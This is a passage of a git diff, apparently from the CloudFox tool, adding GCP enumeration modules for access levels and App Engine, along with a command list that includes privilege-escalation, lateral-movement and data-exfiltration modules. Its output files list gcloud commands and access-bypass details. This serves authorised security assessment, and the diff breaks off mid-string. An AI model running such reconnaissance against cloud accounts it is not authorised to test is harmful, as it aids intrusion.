blank line + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") + GCPLogger.InfoM(" EXECUTION SUMMARY ", "all-checks") + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Total modules executed: %d", len(modules)), "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Total execution time: %s", formatDuration(duration)), "all-checks") + GCPLogger.InfoM("", "all-checks") + GCPLogger.InfoM("Modules executed:", "all-checks") + + // Print modules in columns for better readability + const columnsPerRow = 4 + for i := 0; i < len(modules); i += columnsPerRow { + row := " " + for j := i; j < i+columnsPerRow && j < len(modules); j++ { + row += fmt.Sprintf("%-20s", modules[j]) + } + GCPLogger.InfoM(row, "all-checks") + } + + GCPLogger.InfoM("", "all-checks") + GCPLogger.InfoM(fmt.Sprintf("Output directory: %s", GCPOutputDirectory), "all-checks") + GCPLogger.InfoM("════════════════════════════════════════════════════════════", "all-checks") +} + +// formatDuration formats a duration in a human-readable way +func formatDuration(d time.Duration) string { + if d < time.Minute { + return fmt.Sprintf("%.1f seconds", d.Seconds()) + } else if d < time.Hour { + minutes := int(d.Minutes()) + seconds := int(d.Seconds()) % 60 + return fmt.Sprintf("%dm %ds", minutes, seconds) + } + hours := int(d.Hours()) + minutes := int(d.Minutes()) % 60 + return fmt.Sprintf("%dh %dm", hours, minutes) +} + func init() { // Globals flags for the GCP commands @@ -86,7 +494,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - // 
GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Use all project IDs available to activated gloud account or given gcloud account") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "A", false, "Automatically discover and target all accessible projects") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") @@ -94,16 +502,102 @@ func init() { GCPCommands.PersistentFlags().StringVar(&GCPOutputDirectory, "outdir", defaultOutputDir, "Output Directory ") // GCPCommands.PersistentFlags().IntVarP(&Goroutines, "max-goroutines", "g", 30, "Maximum number of concurrent goroutines") GCPCommands.PersistentFlags().BoolVarP(&GCPWrapTable, "wrap", "w", false, "Wrap table to fit in terminal (complicates grepping)") + GCPCommands.PersistentFlags().BoolVar(&GCPFlatOutput, "flat-output", false, "Use legacy flat output structure instead of hierarchical per-project directories") + GCPCommands.PersistentFlags().BoolVar(&GCPRefreshCache, "refresh-cache", false, "Force re-enumeration of cached data (cache auto-expires after 24 hours)") // Available commands GCPCommands.AddCommand( - commands.GCPBucketsCommand, + // Core/existing commands + commands.GCPStorageCommand, commands.GCPArtifactRegistryCommand, commands.GCPBigQueryCommand, commands.GCPSecretsCommand, commands.GCPIAMCommand, + commands.GCPPermissionsCommand, + commands.GCPResourceIAMCommand, commands.GCPInstancesCommand, commands.GCPWhoAmICommand, + + // Compute/serverless commands + commands.GCPFunctionsCommand, + commands.GCPCloudRunCommand, + commands.GCPAppEngineCommand, + 
commands.GCPGKECommand, + commands.GCPCloudSQLCommand, + + // New infrastructure commands + commands.GCPPubSubCommand, + commands.GCPKMSCommand, + commands.GCPLoggingCommand, + commands.GCPSchedulerCommand, + commands.GCPDNSCommand, + commands.GCPFirewallCommand, + commands.GCPServiceAccountsCommand, + commands.GCPKeysCommand, + commands.GCPEndpointsCommand, + commands.GCPWorkloadIdentityCommand, + commands.GCPIdentityFederationCommand, + commands.GCPOrganizationsCommand, + commands.GCPCloudBuildCommand, + commands.GCPMemorystoreCommand, + commands.GCPFilestoreCommand, + commands.GCPSpannerCommand, + commands.GCPBigtableCommand, + + // Data processing commands + commands.GCPDataflowCommand, + commands.GCPComposerCommand, + + // Security/Compliance commands + commands.GCPVPCSCCommand, + commands.GCPAssetInventoryCommand, + commands.GCPSecurityCenterCommand, + commands.GCPComplianceDashboardCommand, + commands.GCPBackupInventoryCommand, + commands.GCPCostSecurityCommand, + commands.GCPMonitoringAlertsCommand, + + // Network/Infrastructure commands + commands.GCPLoadBalancersCommand, + commands.GCPVPCNetworksCommand, + commands.GCPNetworkTopologyCommand, + + // ML/Data Science commands + commands.GCPNotebooksCommand, + commands.GCPDataprocCommand, + + // Zero Trust/Access commands + commands.GCPIAPCommand, + commands.GCPBeyondCorpCommand, + commands.GCPAccessLevelsCommand, + + // Pentest/Exploitation commands + commands.GCPPrivescCommand, + commands.GCPOrgPoliciesCommand, + commands.GCPStorageEnumCommand, + commands.GCPLoggingEnumCommand, + commands.GCPBigQueryEnumCommand, + commands.GCPBigtableEnumCommand, + commands.GCPSpannerEnumCommand, + commands.GCPCrossProjectCommand, + commands.GCPSourceReposCommand, + commands.GCPServiceAgentsCommand, + commands.GCPDomainWideDelegationCommand, + commands.GCPPrivateServiceConnectCommand, + commands.GCPCloudArmorCommand, + commands.GCPCertManagerCommand, + commands.GCPLateralMovementCommand, + 
commands.GCPDataExfiltrationCommand, + commands.GCPPublicAccessCommand, + commands.GCPFoxMapperCommand, + + // Inventory command + commands.GCPInventoryCommand, + + // Hidden admin commands + commands.GCPHiddenAdminsCommand, + + // All checks (last) GCPAllChecksCommand, ) } diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go new file mode 100644 index 00000000..ecc90b01 --- /dev/null +++ b/gcp/commands/accesslevels.go @@ -0,0 +1,453 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + accesspolicyservice "github.com/BishopFox/cloudfox/gcp/services/accessPolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +var accessLevelOrgID string + +var GCPAccessLevelsCommand = &cobra.Command{ + Use: globals.GCP_ACCESSLEVELS_MODULE_NAME, + Aliases: []string{"access-levels", "conditional-access", "ca"}, + Short: "Enumerate Access Context Manager access levels", + Long: `Enumerate Access Context Manager access levels (conditional access policies). 
+
+Features:
+- Lists all access levels in the organization
+- Shows IP-based, device-based, and identity conditions
+- Identifies overly permissive access levels
+- Analyzes device policy requirements
+
+Organization Discovery:
+- Automatically discovers organization from project ancestry if --org not specified
+- Use --org to explicitly specify an organization ID`,
+	Run: runGCPAccessLevelsCommand,
+}
+
+func init() {
+	GCPAccessLevelsCommand.Flags().StringVar(&accessLevelOrgID, "org", "", "Organization ID (optional; auto-discovered from project ancestry if omitted)")
+}
+
+type AccessLevelsModule struct {
+	gcpinternal.BaseGCPModule
+	OrgID           string
+	OrgAccessLevels map[string][]accesspolicyservice.AccessLevelInfo // orgID -> access levels
+	LootMap         map[string]map[string]*internal.LootFile         // orgID -> loot files
+	mu              sync.Mutex
+}
+
+type AccessLevelsOutput struct {
+	Table []internal.TableFile
+	Loot  []internal.LootFile
+}
+
+func (o AccessLevelsOutput) TableFiles() []internal.TableFile { return o.Table }
+func (o AccessLevelsOutput) LootFiles() []internal.LootFile   { return o.Loot }
+
+func runGCPAccessLevelsCommand(cmd *cobra.Command, args []string) {
+	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ACCESSLEVELS_MODULE_NAME)
+	if err != nil {
+		return
+	}
+
+	// Discover organizations if not specified
+	orgIDs := []string{}
+	if accessLevelOrgID != "" {
+		orgIDs = append(orgIDs, accessLevelOrgID)
+	} else {
+		// Auto-discover organizations from project ancestry
+		discoveredOrgs := discoverOrganizations(cmdCtx.Ctx, cmdCtx.ProjectIDs, cmdCtx.Logger)
+		if len(discoveredOrgs) == 0 {
+			cmdCtx.Logger.ErrorM("Could not discover any organizations. 
Use --org flag to specify one.", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + orgIDs = discoveredOrgs + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered %d organization(s) from project ancestry", len(orgIDs)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + module := &AccessLevelsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgAccessLevels: make(map[string][]accesspolicyservice.AccessLevelInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Process each organization + for _, orgID := range orgIDs { + module.processOrg(cmdCtx.Ctx, orgID, cmdCtx.Logger) + } + + // Write combined output + allLevels := module.getAllAccessLevels() + if len(allLevels) == 0 { + cmdCtx.Logger.InfoM("No access levels found", globals.GCP_ACCESSLEVELS_MODULE_NAME) + return + } + + cmdCtx.Logger.SuccessM(fmt.Sprintf("Found %d access level(s)", len(allLevels)), globals.GCP_ACCESSLEVELS_MODULE_NAME) + module.writeOutput(cmdCtx.Ctx, cmdCtx.Logger) +} + +// discoverOrganizations finds organization IDs from project ancestry +func discoverOrganizations(ctx context.Context, projectIDs []string, logger internal.Logger) []string { + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + return nil + } + + orgMap := make(map[string]bool) + for _, projectID := range projectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + continue + } + + for _, ancestor := range resp.Ancestor { + if ancestor.ResourceId.Type == "organization" { + orgMap[ancestor.ResourceId.Id] = true + } + } + } + + var orgs []string + for orgID := range orgMap { + orgs = append(orgs, orgID) + } + return orgs +} + +func (m *AccessLevelsModule) getAllAccessLevels() []accesspolicyservice.AccessLevelInfo { + var all []accesspolicyservice.AccessLevelInfo + for _, levels := range m.OrgAccessLevels { + all = append(all, levels...) 
+ } + return all +} + +func (m *AccessLevelsModule) processOrg(ctx context.Context, orgID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating access levels for organization: %s", orgID), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this org + if m.LootMap[orgID] == nil { + m.LootMap[orgID] = make(map[string]*internal.LootFile) + m.LootMap[orgID]["access-levels-details"] = &internal.LootFile{ + Name: "access-levels-details", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap[orgID]["access-levels-allowed-ips"] = &internal.LootFile{ + Name: "access-levels-allowed-ips", + Contents: "", + } + } + m.mu.Unlock() + + svc := accesspolicyservice.New() + + levels, err := svc.ListAccessLevels(orgID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_ACCESSLEVELS_MODULE_NAME, + fmt.Sprintf("Could not list access levels for org %s", orgID)) + return + } + + m.mu.Lock() + m.OrgAccessLevels[orgID] = levels + for _, level := range levels { + m.addToLoot(orgID, level) + } + m.mu.Unlock() +} + +func (m *AccessLevelsModule) addToLoot(orgID string, level accesspolicyservice.AccessLevelInfo) { + if lootFile := m.LootMap[orgID]["access-levels-details"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# ACCESS LEVEL: %s\n"+ + "# =============================================================================\n"+ + "# Title: %s\n"+ + "# Policy: %s\n"+ + "# Combining Function: %s\n"+ + "# Conditions: %d\n", + level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) + + // Condition details + for i, condition := range level.Conditions { + lootFile.Contents += fmt.Sprintf("# --- Condition %d ---\n", i+1) + if 
len(condition.IPSubnetworks) > 0 { + lootFile.Contents += fmt.Sprintf("# IP Subnets: %s\n", strings.Join(condition.IPSubnetworks, ", ")) + } + if len(condition.Members) > 0 { + lootFile.Contents += fmt.Sprintf("# Members: %s\n", strings.Join(condition.Members, ", ")) + } + if len(condition.Regions) > 0 { + lootFile.Contents += fmt.Sprintf("# Regions: %s\n", strings.Join(condition.Regions, ", ")) + } + if condition.DevicePolicy != nil { + lootFile.Contents += "# Device Policy: configured\n" + } + } + + // Extract short level name for gcloud commands + levelName := level.Name + policyName := level.PolicyName + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe this access level: +gcloud access-context-manager levels describe %s --policy=%s + +# List all conditions for this access level: +gcloud access-context-manager levels describe %s --policy=%s --format=json | jq '.basic.conditions' + +# List all access levels in this policy: +gcloud access-context-manager levels list --policy=%s + +# === EXPLOIT COMMANDS === + +# Check if your current IP is allowed by this access level: +curl -s ifconfig.me && echo " <- Check if this IP is in the allowed subnets above" + +`, levelName, policyName, + levelName, policyName, + policyName) + + // Add IP-specific bypass checks + if len(level.Conditions) > 0 { + for _, condition := range level.Conditions { + if len(condition.IPSubnetworks) > 0 { + lootFile.Contents += "# Test connectivity from allowed IP ranges (use with VPN/proxy):\n" + for _, ip := range condition.IPSubnetworks { + lootFile.Contents += fmt.Sprintf("# Allowed subnet: %s\n", ip) + } + lootFile.Contents += "\n" + } + if len(condition.Members) > 0 { + lootFile.Contents += "# Members that can bypass this access level:\n" + for _, member := range condition.Members { + lootFile.Contents += fmt.Sprintf("# %s\n", member) + } + lootFile.Contents += "\n" + } + } + } + } + + for _, condition := range level.Conditions { + for _, ip := range 
condition.IPSubnetworks { + if lootFile := m.LootMap[orgID]["access-levels-allowed-ips"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf("%s # %s\n", ip, level.Name) + } + } + } +} + +func (m *AccessLevelsModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *AccessLevelsModule) getLevelsHeader() []string { + return []string{"Org ID", "Name", "Title", "Policy", "Combining", "Conditions", "Device Policy"} +} + +func (m *AccessLevelsModule) getConditionsHeader() []string { + return []string{"Org ID", "Level", "Condition", "IP Ranges", "Members", "Regions", "Device Requirements"} +} + +func (m *AccessLevelsModule) levelsToTableBody(levels []accesspolicyservice.AccessLevelInfo, orgID string) [][]string { + var body [][]string + for _, level := range levels { + hasDevicePolicy := "No" + for _, cond := range level.Conditions { + if cond.DevicePolicy != nil { + hasDevicePolicy = "Yes" + break + } + } + + combiningFunc := level.CombiningFunction + if combiningFunc == "" { + combiningFunc = "AND" + } + + body = append(body, []string{ + orgID, + level.Name, + level.Title, + level.PolicyName, + combiningFunc, + fmt.Sprintf("%d", len(level.Conditions)), + hasDevicePolicy, + }) + } + return body +} + +func (m *AccessLevelsModule) conditionsToTableBody(levels []accesspolicyservice.AccessLevelInfo, orgID string) [][]string { + var body [][]string + for _, level := range levels { + for i, cond := range level.Conditions { + ipRanges := strings.Join(cond.IPSubnetworks, ", ") + if ipRanges == "" { + ipRanges = "(any)" + } + + members := strings.Join(cond.Members, ", ") + if members == "" { + members = "(any)" + } + + regions := strings.Join(cond.Regions, ", ") + if regions == "" { + regions = "(any)" + } + + deviceReqs := "(none)" + if cond.DevicePolicy != nil { + var reqs []string + if cond.DevicePolicy.RequireScreenLock 
{ + reqs = append(reqs, "screen-lock") + } + if cond.DevicePolicy.RequireCorpOwned { + reqs = append(reqs, "corp-owned") + } + if cond.DevicePolicy.RequireAdminApproval { + reqs = append(reqs, "admin-approval") + } + if len(reqs) > 0 { + deviceReqs = strings.Join(reqs, ", ") + } + } + + body = append(body, []string{ + orgID, + level.Name, + fmt.Sprintf("%d", i+1), + ipRanges, + members, + regions, + deviceReqs, + }) + } + } + return body +} + +func (m *AccessLevelsModule) buildTablesForOrg(orgID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if levels, ok := m.OrgAccessLevels[orgID]; ok && len(levels) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "access-levels", + Header: m.getLevelsHeader(), + Body: m.levelsToTableBody(levels, orgID), + }) + + condBody := m.conditionsToTableBody(levels, orgID) + if len(condBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "access-level-conditions", + Header: m.getConditionsHeader(), + Body: condBody, + }) + } + } + + return tableFiles +} + +func (m *AccessLevelsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for orgID := range m.OrgAccessLevels { + tableFiles := m.buildTablesForOrg(orgID) + + var lootFiles []internal.LootFile + if orgLoot, ok := m.LootMap[orgID]; ok { + for _, loot := range orgLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.OrgLevelData[orgID] = AccessLevelsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + 
logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} + +func (m *AccessLevelsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Collect all org IDs + var orgIDs []string + for orgID := range m.OrgAccessLevels { + orgIDs = append(orgIDs, orgID) + } + + // Build combined tables with org ID in each row + var allLevelRows [][]string + var allCondRows [][]string + for orgID, levels := range m.OrgAccessLevels { + allLevelRows = append(allLevelRows, m.levelsToTableBody(levels, orgID)...) + allCondRows = append(allCondRows, m.conditionsToTableBody(levels, orgID)...) + } + + if len(allLevelRows) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-levels", + Header: m.getLevelsHeader(), + Body: allLevelRows, + }) + } + + if len(allCondRows) > 0 { + tables = append(tables, internal.TableFile{ + Name: "access-level-conditions", + Header: m.getConditionsHeader(), + Body: allCondRows, + }) + } + + var lootFiles []internal.LootFile + for _, orgLoot := range m.LootMap { + for _, loot := range orgLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := AccessLevelsOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", orgIDs, orgIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ACCESSLEVELS_MODULE_NAME) + } +} diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go new file mode 100644 index 00000000..47d88a3a --- /dev/null +++ b/gcp/commands/appengine.go @@ -0,0 +1,828 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + 
gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/appengine/v1" +) + +// Module name constant +const GCP_APPENGINE_MODULE_NAME string = "app-engine" + +var GCPAppEngineCommand = &cobra.Command{ + Use: GCP_APPENGINE_MODULE_NAME, + Aliases: []string{"appengine", "gae"}, + Short: "Enumerate App Engine applications and security configurations", + Long: `Analyze App Engine applications for security configurations and potential issues. + +Features: +- Lists all App Engine services and versions +- Identifies public services without authentication +- Analyzes ingress settings and firewall rules +- Detects environment variable secrets +- Reviews service account configurations +- Identifies deprecated runtimes +- Analyzes traffic splitting configurations`, + Run: runGCPAppEngineCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AppEngineApp struct { + ProjectID string + ID string + LocationID string + AuthDomain string + DefaultHostname string + ServingStatus string + DefaultBucket string + ServiceAccount string + DispatchRules int + FirewallRules int +} + +type AppEngineService struct { + ProjectID string + ID string + AppID string + Split map[string]float64 + DefaultURL string + VersionCount int + LatestVersion string +} + +type AppEngineVersion struct { + ProjectID string + ServiceID string + ID string + AppID string + Runtime string + Environment string + ServingStatus string + CreateTime string + InstanceClass string + Scaling string + Network string + VPCConnector string + IngressSettings string + EnvVarCount int + SecretEnvVars int + ServiceAccount string + URL string + DeprecatedRuntime bool + DefaultSA bool + Public bool +} + +type AppEngineFirewallRule struct { + ProjectID string + Priority int64 + Action string + SourceRange string + Description string +} + +// ------------------------------ +// Module Struct +// ------------------------------ 
+type AppEngineModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectApps map[string][]AppEngineApp + ProjectServices map[string][]AppEngineService + ProjectVersions map[string][]AppEngineVersion + ProjectFirewallRules map[string][]AppEngineFirewallRule + LootMap map[string]map[string]*internal.LootFile + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis + mu sync.Mutex + + totalApps int + totalServices int + publicCount int + secretsFound int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type AppEngineOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o AppEngineOutput) TableFiles() []internal.TableFile { return o.Table } +func (o AppEngineOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_APPENGINE_MODULE_NAME) + if err != nil { + return + } + + module := &AppEngineModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectApps: make(map[string][]AppEngineApp), + ProjectServices: make(map[string][]AppEngineService), + ProjectVersions: make(map[string][]AppEngineVersion), + ProjectFirewallRules: make(map[string][]AppEngineFirewallRule), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) + + aeService, err := appengine.NewService(ctx) + if err 
!= nil { + logger.ErrorM(fmt.Sprintf("Failed to create App Engine service: %v", err), GCP_APPENGINE_MODULE_NAME) + return + } + + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, aeService, logger) + }(projectID) + } + wg.Wait() + + if m.totalApps == 0 { + logger.InfoM("No App Engine applications found", GCP_APPENGINE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d App Engine app(s) with %d service(s) and %d version(s)", + m.totalApps, m.totalServices, len(m.getAllVersions())), GCP_APPENGINE_MODULE_NAME) + + if m.publicCount > 0 { + logger.InfoM(fmt.Sprintf("Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) + } + + if m.secretsFound > 0 { + logger.InfoM(fmt.Sprintf("Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *AppEngineModule) processProject(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating App Engine for project: %s", projectID), GCP_APPENGINE_MODULE_NAME) + } + + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + if !strings.Contains(err.Error(), "404") { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not get App Engine app in project %s", projectID)) + } + return + } + + m.mu.Lock() + m.totalApps++ + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["appengine-commands"] = &internal.LootFile{ + Name: "appengine-commands", + Contents: "# App Engine Commands\n" + + "# 
Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + } + + // Add app-level enumeration and exploit commands to loot + m.addAppToLoot(projectID, app.Id, app.DefaultHostname, app.LocationId, app.ServiceAccount) + m.mu.Unlock() + + appRecord := AppEngineApp{ + ProjectID: projectID, + ID: app.Id, + LocationID: app.LocationId, + AuthDomain: app.AuthDomain, + DefaultHostname: app.DefaultHostname, + ServingStatus: app.ServingStatus, + DefaultBucket: app.DefaultBucket, + ServiceAccount: app.ServiceAccount, + } + + if app.DispatchRules != nil { + appRecord.DispatchRules = len(app.DispatchRules) + } + + m.mu.Lock() + m.ProjectApps[projectID] = append(m.ProjectApps[projectID], appRecord) + m.mu.Unlock() + + m.enumerateServices(ctx, projectID, aeService, logger) + m.enumerateFirewallRules(ctx, projectID, aeService, logger) +} + +func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + services, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine services in project %s", projectID)) + return + } + + for _, svc := range services.Services { + m.mu.Lock() + m.totalServices++ + m.mu.Unlock() + + serviceRecord := AppEngineService{ + ProjectID: projectID, + ID: svc.Id, + AppID: projectID, + } + + if svc.Split != nil { + serviceRecord.Split = svc.Split.Allocations + } + + m.mu.Lock() + m.ProjectServices[projectID] = append(m.ProjectServices[projectID], serviceRecord) + m.mu.Unlock() + + ingressSettings := "all" + if svc.NetworkSettings != nil && svc.NetworkSettings.IngressTrafficAllowed != "" { + ingressSettings = svc.NetworkSettings.IngressTrafficAllowed + } + + m.enumerateVersions(ctx, projectID, svc.Id, ingressSettings, aeService, logger) + } +} + +func (m *AppEngineModule) enumerateVersions(ctx 
context.Context, projectID, serviceID, ingressSettings string, aeService *appengine.APIService, logger internal.Logger) { + versions, err := aeService.Apps.Services.Versions.List(projectID, serviceID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine versions for service %s", serviceID)) + return + } + + for _, ver := range versions.Versions { + versionRecord := AppEngineVersion{ + ProjectID: projectID, + ServiceID: serviceID, + ID: ver.Id, + AppID: projectID, + Runtime: ver.Runtime, + Environment: ver.Env, + ServingStatus: ver.ServingStatus, + CreateTime: ver.CreateTime, + IngressSettings: ingressSettings, + ServiceAccount: ver.ServiceAccount, + URL: ver.VersionUrl, + } + + if ver.InstanceClass != "" { + versionRecord.InstanceClass = ver.InstanceClass + } + + if ver.Network != nil { + versionRecord.Network = ver.Network.Name + } + + if ver.VpcAccessConnector != nil { + versionRecord.VPCConnector = ver.VpcAccessConnector.Name + } + + // Scaling type + if ver.AutomaticScaling != nil { + versionRecord.Scaling = "automatic" + } else if ver.BasicScaling != nil { + versionRecord.Scaling = "basic" + } else if ver.ManualScaling != nil { + versionRecord.Scaling = "manual" + } + + // Check for deprecated runtime + versionRecord.DeprecatedRuntime = m.isDeprecatedRuntime(ver.Runtime) + + // Check environment variables for secrets + if ver.EnvVariables != nil { + versionRecord.EnvVarCount = len(ver.EnvVariables) + secretCount := m.analyzeEnvVars(ver.EnvVariables, serviceID, ver.Id, projectID) + versionRecord.SecretEnvVars = secretCount + } + + // Check ingress settings for public access + if versionRecord.IngressSettings == "all" || versionRecord.IngressSettings == "INGRESS_TRAFFIC_ALLOWED_ALL" { + versionRecord.Public = true + m.mu.Lock() + m.publicCount++ + m.mu.Unlock() + } + + // Check for default service account + if versionRecord.ServiceAccount == "" || 
strings.Contains(versionRecord.ServiceAccount, "@appspot.gserviceaccount.com") { + versionRecord.DefaultSA = true + } + + m.mu.Lock() + m.ProjectVersions[projectID] = append(m.ProjectVersions[projectID], versionRecord) + m.mu.Unlock() + } +} + +func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID string, aeService *appengine.APIService, logger internal.Logger) { + rules, err := aeService.Apps.Firewall.IngressRules.List(projectID).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, + fmt.Sprintf("Could not enumerate App Engine firewall rules in project %s", projectID)) + return + } + + for _, rule := range rules.IngressRules { + fwRule := AppEngineFirewallRule{ + ProjectID: projectID, + Priority: rule.Priority, + Action: rule.Action, + SourceRange: rule.SourceRange, + Description: rule.Description, + } + + m.mu.Lock() + m.ProjectFirewallRules[projectID] = append(m.ProjectFirewallRules[projectID], fwRule) + m.mu.Unlock() + } + + m.mu.Lock() + for i := range m.ProjectApps[projectID] { + if m.ProjectApps[projectID][i].ProjectID == projectID { + m.ProjectApps[projectID][i].FirewallRules = len(rules.IngressRules) + break + } + } + m.mu.Unlock() +} + +func (m *AppEngineModule) addAppToLoot(projectID, appID, defaultHostname, locationID, serviceAccount string) { + lootFile := m.LootMap[projectID]["appengine-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# APP ENGINE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# Default Hostname: %s\n"+ + "# Service Account: %s\n", + appID, projectID, locationID, defaultHostname, serviceAccount, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe app: +gcloud app describe --project=%s + +# 
